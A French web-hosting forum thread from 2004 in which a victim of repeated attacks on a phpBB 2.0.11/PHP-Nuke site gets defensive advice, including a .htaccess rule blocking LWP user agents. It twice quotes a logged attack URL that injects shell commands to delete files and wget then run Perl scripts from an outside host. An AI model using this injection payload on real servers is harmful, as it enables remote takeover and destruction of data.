Recif Posté 28 Décembre 2004 Partager Posté 28 Décembre 2004 (modifié) Bonjour, quelqu'un sait si on peut protéger de la suppression et/ou de la modification les fichiers de tout un répèrtoire via .htaccess?? Steph Modifié 28 Décembre 2004 par Recif Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 28 Décembre 2004 Partager Posté 28 Décembre 2004 Salut Steph, Le fichier .htaccess n'a pas cette vocation. Par contre, si tu as accès au shell Linux, tu peux changer les permissions sur les fichiers et répertoires concernés. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recif Posté 28 Décembre 2004 Auteur Partager Posté 28 Décembre 2004 J'ai tous mes fichiers en CHMOD 444 et la nuit dernière tous ont été supprimés!... Comment les protéger autrement?... Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 28 Décembre 2004 Partager Posté 28 Décembre 2004 Pour éviter que des fichiers soient supprimés, il faut enlever les permissions d'écriture du répertoire qui les contient Mais ils ont été supprimés par qui/quoi ? Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recif Posté 28 Décembre 2004 Auteur Partager Posté 28 Décembre 2004 (modifié) J'ai le répertoire en CHMOD 545 La raison est que je me fais hacker violament mon site depuis une semaine et ce matin vers 2h00 c'était la totale : tous les fichiers de la racine supprimés. En général c'était d'autre fichiers modifiés pour soit empêcher l'accès au site, soit changer les valeurs d'un formulaire... J'ai installé sentinel 2.1.2 et j'ai une attaque env. toutes les 4/5mn Modifié 28 Décembre 2004 par Recif Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 28 Décembre 2004 Partager Posté 28 Décembre 2004 Tu as des forums phpBB sur le serveur ? Regardes si tu n'as pas des fichiers .txt dans les répertoires /tmp et /var/tmp Enlèves-les et changes le mode de /usr/bin/wget en 750 Je pense que pratiquement tous les serveurs dédiés ont subi des attaques ces derniers jours, le Hub aussi. J'ai refusé de servir plus de 200 000 pages depuis samedi. Ca fait pas mal d'attaques. On avait une tentative de hack par seconde, au plus fort du weekend. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recif Posté 28 Décembre 2004 Auteur Partager Posté 28 Décembre 2004 En effet j'ai un phpbb. J'ai jetté un oeil et pas trouvé de fichiers txt Les attaques sont de type www.xxxx.com/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;wget%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl%20sess_0bc3910d07edb36750a9babbd179edb4;wget%20http://filepack.superbr.org/wow.e;perl%20wow.e%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 quant au usr/bin/ Je n'ais pas d'accès (hébèrgement dédié) Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 28 Décembre 2004 Partager Posté 28 Décembre 2004 Quelle version de phpBB ? pas la dernière probablement ? Si tu as accès au firewall, il suffit de fermer l'accès au serveur filepack.superbr.org (si ton hébergeur le permet) Dans la négative, envoies un mot au support en demandant qu'ils le fassent. Joints-y une partie de tes logs pour justifier ta demande. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 28 Décembre 2004 Partager Posté 28 Décembre 2004 Une chose... la ligne de l'attaque n'est pas complète. Peux-tu donner une ligne avec le UserAgent ? Je te donnerais une règle pour le fichier .htaccess. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recif Posté 28 Décembre 2004 Auteur Partager Posté 28 Décembre 2004 Ok, voici le mail complet que j'ai d'un des derniers : X-Mailer: NukeSentinelT Message-Id: <E1CjLWW-0005Jf-00_AT_http5> Sender: <hyipfrance_AT_http1> Date: Tue, 28 Dec 2004 18:52:44 +0100 Date & Heure: 2004-12-28 18:52:42 IP Blockée: 64.62.172.228 Membre ID: Anonymous (1) Raison: Abuse-Script -------------------- Membre Agent: LWP::Simple/5.803 Requête tentée: www.xxxx.com/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;wget%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl%20sess_0bc3910d07edb36750a9babbd179edb4;wget%20http://filepack.superbr.org/wow.e;perl%20wow.e%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 Référant de: none IP Cliente: none Adresse Décellée: 64.62.172.228 Port Décellé: 58861 MÉthode de la requête: GET -------------------- Who-Is pour cette IP OrgName: Hurricane Electric OrgID: HURC Address: 760 Mission Court City: Fremont StateProv: CA PostalCode: 94539 Country: US NetRange: 64.62.128.0 - 64.62.255.255 CIDR: 64.62.128.0/17 NetName: HURRICANE-4 NetHandle: NET-64-62-128-0-1 Parent: NET-64-0-0-0-0 NetType: Direct Allocation NameServer: NS1.HE.NET NameServer: NS2.HE.NET NameServer: NS3.HE.NET Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE RegDate: 2002-08-27 Updated: 2003-09-15 TechHandle: ZH17-ARIN TechName: Hurricane Electric TechPhone: +1-510-580-4100 TechEmail: hostmaster_AT_he.net OrgTechHandle: ZH17-ARIN OrgTechName: Hurricane Electric OrgTechPhone: +1-510-580-4100 OrgTechEmail: hostmaster_AT_he.net Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recif Posté 28 Décembre 2004 Auteur Partager Posté 28 Décembre 2004 Et la version phpbb : Module's Name: Forums Module's Version: 2.0.11 Module's Description: phpBB 2.0.11 port for PHP-Nuke License: GNU/GPL Author's Name: chatserv Author's Email: chatserv_AT_nukeresources.com tu crois que les attaques sont toutes parties de ce forum? Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recif Posté 28 Décembre 2004 Auteur Partager Posté 28 Décembre 2004 Le problème c'est que c'est un hébergement mutualisé, je n'ais aucun accès à la config Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 29 Décembre 2004 Partager Posté 29 Décembre 2004 Salut Recif, Pratiquement toutes ces attaques viennent par l'outil LWP et ont donc toutes le user-agent "LWP::Simple" En général, la première requête de l'attaque vient avec le UserAgent "lwp-trivial". Il suffit donc de bloquer ces deux User-Agents dans un fichier .htaccess, comme ceci: RewriteEngine onRewriteCond %{HTTP_USER_AGENT} LWP::Simple [NC,OR]RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC]RewriteRule .* - [F] Tu devrais être débarrassé de ces attaques. Dan Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recif Posté 29 Décembre 2004 Auteur Partager Posté 29 Décembre 2004 Ok, merci, je vais essayer ça. Sinon en phpbb je ne trouve pas de patch de sécurité pour la v2.0.11... Lien vers le commentaire Partager sur d’autres sites More sharing options...
Sujets conseillés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant